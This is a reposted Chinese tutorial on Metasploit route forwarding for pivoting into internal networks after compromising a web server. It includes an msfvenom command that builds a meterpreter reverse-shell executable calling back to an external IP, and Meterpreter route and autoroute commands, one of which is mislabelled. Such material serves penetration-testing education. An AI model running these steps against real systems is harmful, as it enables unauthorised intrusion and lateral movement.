后滲透階段之基於MSF的路由轉發


目錄

反彈MSF類型的Shell

添加內網路由

MSF的跳板功能是MSF框架中自帶的一個路由轉發功能,其實現過程就是MSF框架在已經獲取的Meterpreter Shell的基礎上添加一條去往“內網”的路由,直接使用MSF去訪問原本不能直接訪問的內網資源,只要路由可達了那么我們使用MSF來進行探測了。

我們現在有下面這個環境:

Web服務器通過端口映射,對外提供Web服務。Web服務器上有兩張網卡,內網分別還有其他兩台服務器,一台開放了http服務,一台開放了SMB服務。拓撲圖如下:

 

 

反彈MSF類型的Shell

我們通過web滲透,成功往Web服務器上上傳了一句話木馬,成功用菜刀連接。

然后我們現在想獲得一個MSF類型的Shell。

我們先生成一個木馬文件

 msfvenom -p windows/meterpreter/reverse_tcp lhost=112.74.89.58 lport=42906 -f exe -o test.exe

 

 用菜刀上傳到Web服務器上,然后執行我們的木馬程序,Kali成功獲得反彈的MSF類型的shell。

 

 

添加內網路由

然后我們現在想要繼續滲透內網。

我們先獲取目標內網相關信息,可以看到該主機上的網卡有兩個網段。

run get_local_subnets

 

 

如果我們不添加這兩個網段路由的話,是探測不到這兩個網段其他主機的。

以下是手動添加到達192.168.11.0和192.168.12.0的路由

 1 #在全局給指定的session加
 2 route add 192.168.11.0  255.255.255.0  1     #在session1中添加到達192.168.11.0網段的路由
 3 route add 192.168.12.0  255.255.255.0  1     #在session1中添加到達192.168.12.0網段的路由
 4 route add 0.0.0.0       0.0.0.0        1     #在session1中添加到達0.0.0.0/24網段的路由
 5 route del 192.168.12.0  255.255.255.0  2     #在session2中刪除到達192.168.12.0網段的路由
 6 route print    #打印路由信息
 7  
 8 #也可以在進入session下添加路由
 9 run autoroute -s 192.168.11.0/24             #添加到達192.168.11.0網段的路由
10 run autoroute -s 192.168.11.0/24             #添加到達192.168.12.0網段的路由
11 run autoroute -p            #打印路由信息

 

 

以下是添加路由前后探測的對比信息。

注意:在實際的內網滲透中,我們可以直接添加到 0.0.0.0/24的路由,這樣,只要該被控主機可達的地址就都可達!

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM